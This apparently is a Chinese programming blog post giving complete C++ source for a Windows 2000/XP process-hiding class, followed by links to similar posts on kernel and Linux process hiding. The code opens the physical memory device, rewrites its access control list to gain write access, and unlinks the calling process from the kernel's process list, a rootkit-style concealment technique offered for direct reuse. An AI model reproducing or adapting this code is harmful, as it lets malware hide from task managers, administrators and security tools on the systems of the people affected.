进程隐藏类

原创 2006年06月23日 17:13:00

头文件如下:

class CHideProcss 
{
public:
 CHideProcss();
 BOOL HideProcess();
 virtual ~CHideProcss();
private:
 BOOL InitNTDLL();
 BOOL YHideProcess();
 VOID CloseNTDLL();
 VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection);
 HANDLE OpenPhysicalMemory();
 PVOID LinearToPhys(PULONG BaseAddress, PVOID addr);
 ULONG GetData(PVOID addr);
 BOOL SetData(PVOID addr,ULONG data);
 long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp);

};

2。CPP文件如下

// HideProcss.cpp: implementation of the CHideProcss class.
//进程隐藏程序
// 要隐藏时调用HideProcess即可
//////////////////////////////////////////////////////////////////////

#i nclude "stdafx.h"
#i nclude "HideProcss.h"
#i nclude<windows.h>
#i nclude<Accctrl.h>
#i nclude<Aclapi.h>

#ifdef _DEBUG
#undef THIS_FILE
static char THIS_FILE[]=__FILE__;
#define new DEBUG_NEW
#endif

#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

typedef LONG NTSTATUS;

typedef struct _IO_STATUS_BLOCK
{
    NTSTATUS Status;
    ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

#define OBJ_INHERIT                0x00000002L
#define OBJ_PERMANENT              0x00000010L
#define OBJ_EXCLUSIVE              0x00000020L
#define OBJ_CASE_INSENSITIVE       0x00000040L
#define OBJ_OPENIF                 0x00000080L
#define OBJ_OPENLINK               0x00000100L
#define OBJ_KERNEL_HANDLE          0x00000200L
#define OBJ_VALID_ATTRIBUTES       0x000003F2L

typedef struct _OBJECT_ATTRIBUTES
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes
    );

typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
    );

RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
HMODULE       g_hNtDLL = NULL;
PVOID         g_pMapPhysicalMemory = NULL;
HANDLE        g_hMPM = NULL;
OSVERSIONINFO g_osvi;
//---------------------------------------------------------------------------
//////////////////////////////////////////////////////////////////////
// Construction/Destruction
//////////////////////////////////////////////////////////////////////

CHideProcss::CHideProcss()
{

}

CHideProcss::~CHideProcss()
{

}

BOOL CHideProcss::InitNTDLL()
{
    g_hNtDLL = LoadLibrary("ntdll.dll");
 
    if (NULL == g_hNtDLL)
        return FALSE;
 
    RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,
  
  "RtlInitUnicodeString");
    ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
 
    return TRUE;
}
//---------------------------------------------------------------------------
VOID CHideProcss::CloseNTDLL()
{
    if(NULL != g_hNtDLL)
        FreeLibrary(g_hNtDLL);

    g_hNtDLL = NULL;
}
//---------------------------------------------------------------------------
VOID CHideProcss::SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
    PACL pDacl                    = NULL;
    PSECURITY_DESCRIPTOR pSD    = NULL;
    PACL pNewDacl = NULL;
   
    DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL,
  
  NULL, &pDacl, NULL, &pSD);
 
    if(ERROR_SUCCESS != dwRes)
    {
  
  if(pSD)
   LocalFree(pSD);
  if(pNewDacl)
   LocalFree(pNewDacl);
    }
 
    EXPLICIT_ACCESS ea;
    RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
    ea.grfAccessPermissions = SECTION_MAP_WRITE;
    ea.grfAccessMode = GRANT_ACCESS;
    ea.grfInheritance= NO_INHERITANCE;
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
    ea.Trustee.ptstrName = "CURRENT_USER";
 
    dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
   
    if(ERROR_SUCCESS != dwRes)
    {
  
  if(pSD)
   LocalFree(pSD);
  if(pNewDacl)
   LocalFree(pNewDacl);
    }
    dwRes = SetSecurityInfo
  
  (hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);
   
    if(ERROR_SUCCESS != dwRes)
    {
  
  if(pSD)
   LocalFree(pSD);
  if(pNewDacl)
   LocalFree(pNewDacl);
    }
 
}
//---------------------------------------------------------------------------
HANDLE CHideProcss::OpenPhysicalMemory()
{
    NTSTATUS status;
    UNICODE_STRING physmemString;
    OBJECT_ATTRIBUTES attributes;
    ULONG PhyDirectory;
 
    g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx (&g_osvi);
 
    if (5 != g_osvi.dwMajorVersion)
        return NULL;
 
    switch(g_osvi.dwMinorVersion)
    {
 case 0:
  PhyDirectory = 0x30000;
  break; //2k
 case 1:
  PhyDirectory = 0x39000;
  break; //xp
 default:
  return NULL;
    }
 
    RtlInitUnicodeString(&physmemString, L"//Device//PhysicalMemory");
 
    attributes.Length                    = sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory            = NULL;
    attributes.ObjectName                = &physmemString;
    attributes.Attributes                = 0;
    attributes.SecurityDescriptor        = NULL;
    attributes.SecurityQualityOfService    = NULL;
 
    status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
 
    if(status == STATUS_ACCESS_DENIED)
    {
        status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
        SetPhyscialMemorySectionCanBeWrited(g_hMPM);
        CloseHandle(g_hMPM);
        status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
    }
 
    if(!NT_SUCCESS(status))
        return NULL;
 
    g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory,
  
  0x1000);
 
    if( g_pMapPhysicalMemory == NULL )
        return NULL;
 
    return g_hMPM;
}
//---------------------------------------------------------------------------
PVOID CHideProcss::LinearToPhys(PULONG BaseAddress, PVOID addr)
{
    ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr;
    PGDE = BaseAddress[VAddr>>22];

    if (0 == (PGDE&1))
        return 0;

    ULONG tmp = PGDE & 0x00000080;

    if (0 != tmp)
    {
        PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
    }
    else
    {
        PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
        PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
       
        if (0 == (PTE&1))
            return 0;

        PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
        UnmapViewOfFile((PVOID)PGDE);
    }

    return (PVOID)PAddr;
}
//---------------------------------------------------------------------------
ULONG CHideProcss::GetData(PVOID addr)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
    PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys &
  
  0xfffff000, 0x1000);
   
    if (0 == tmp)
        return 0;
 
    ULONG ret = tmp[(phys & 0xFFF)>>2];
    UnmapViewOfFile(tmp);
 
    return ret;
}
//---------------------------------------------------------------------------
BOOL CHideProcss::SetData(PVOID addr,ULONG data)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
    PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);

    if (0 == tmp)
        return FALSE;

    tmp[(phys & 0xFFF)>>2] = data;
    UnmapViewOfFile(tmp);

    return TRUE;
}
//---------------------------------------------------------------------------
long __stdcall CHideProcss::exeception(struct _EXCEPTION_POINTERS *tmp)
{
   ExitProcess(0);
   return 1 ;
}
//---------------------------------------------------------------------------
BOOL CHideProcss::YHideProcess()
{
//    SetUnhandledExceptionFilter(exeception);

    if (FALSE == InitNTDLL())
        return FALSE;

    if (0 == OpenPhysicalMemory())
        return FALSE;

    ULONG thread  = GetData((PVOID)0xFFDFF124); //kteb
    ULONG process = GetData(PVOID(thread + 0x44)); //kpeb

    ULONG fw, bw;
    if (0 == g_osvi.dwMinorVersion)
    {
        fw = GetData(PVOID(process + 0xa0));
        bw = GetData(PVOID(process + 0xa4));       
    }

    if (1 == g_osvi.dwMinorVersion)
    {
        fw = GetData(PVOID(process + 0x88));
        bw = GetData(PVOID(process + 0x8c));
    }
       
    SetData(PVOID(fw + 4), bw);
    SetData(PVOID(bw), fw);

    CloseHandle(g_hMPM);
    CloseNTDLL();

    return TRUE;
}

// 隐藏进程的显示
BOOL CHideProcss::HideProcess()
{
 static BOOL b_hide = false;
 if (!b_hide)
 {
  b_hide = true;
  YHideProcess();
  return true;
 }

 return true;
}

一款十分强大得进程隐藏工具

  • 2009年03月02日 03:13
  • 372KB
  • 下载

Linux隐藏进程

系统信息:内核为2.6.32, CentOSX86_64 由于不能修改内核源码,故需要引入劫持系统调用技术、Linux可卸载模块编程技术 示例程序 #include #include ...
  • liangzhao_jay
  • liangzhao_jay
  • 2016年03月09日 12:10
  • 1754

linux下如何隐藏进程(ps/top)

原文地址::http://blog.csdn.net/sanbailiushiliuye/article/details/7561869 相关文章 1、Linux系统上对其他用户隐...
  • xqhrs232
  • xqhrs232
  • 2016年07月14日 09:26
  • 848

MFC隐藏进程自身(任务管理器不可见,wSysCheck等工具可见)

MFC隐藏进程 只要把cpp和h加入工程,include就可以了。 代码地址: //------------------HideProcess.h-----------------...
  • u011672712
  • u011672712
  • 2016年06月06日 12:19
  • 1695

进程隐藏学习总结

怎么隐藏进程 工具/原料 HideToolz 步骤/方法 1 在百度上面搜索HideToolz ,打开第一个搜索结果,点击进入下载。把HideToolz 下载到你的电脑里面。 2 鼠标双击打开...
  • bcbobo21cn
  • bcbobo21cn
  • 2016年05月08日 15:11
  • 1376

内核隐藏进程

#include #include #include NTKERNELAPI UCHAR *PsGetProcessImageFileName(PEPROCESS Process); #i...
  • qq125096885
  • qq125096885
  • 2016年11月16日 18:22
  • 506

驱动层SSDT 隐藏进程

闲着没事,便想在熟悉下之前看过的驱动编程相关知识,于是就写了这个简单的驱动曾隐藏进程程序。 要点:  在驱动层隐藏,主要还是使用SSDT挂钩的方法,相关知识,可以到网上查找,在隐藏进程时,为了能够隐...
  • ilovemayverymuch
  • ilovemayverymuch
  • 2013年11月27日 21:19
  • 2539

Win64 驱动内核编程-21.DKOM隐藏和保护进程

DKOM隐藏和保护进程 主要就是操作链表,以及修改节点内容。 DKOM 隐藏进程和保护进程的本质是操作 EPROCESS 结构体,不同的系统用的时候注意查下相关定义,确定下偏移,下面的数据是以wi...
  • u013761036
  • u013761036
  • 2017年03月23日 23:08
  • 1667

API勾取实现进程隐藏

Windows中,任务管理器、Procexp等软件都是通过遍历进程信息结构体链表来获取进程名的,所以我们只要获取进程信息结构体链表然后删除指定进程信息块就能实现进程的隐藏,这种隐藏其实不是真正的隐藏而...
  • qq_20977145
  • qq_20977145
  • 2016年07月26日 18:19
  • 3051

Linux进程隐藏的一种实现思路

目标读者:系统安全爱好者 阅读时长:约 7分钟 本文概要:一种 Linux 中进程隐藏的思路、操作与步骤截图 前置知识:最好对 Linux 下编译程序略知一二(文末有知识注解与扩展阅...
  • qq_27446553
  • qq_27446553
  • 2017年01月18日 03:02
  • 644
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:进程隐藏类
举报原因:
原因补充:

(最多只允许输入30个字)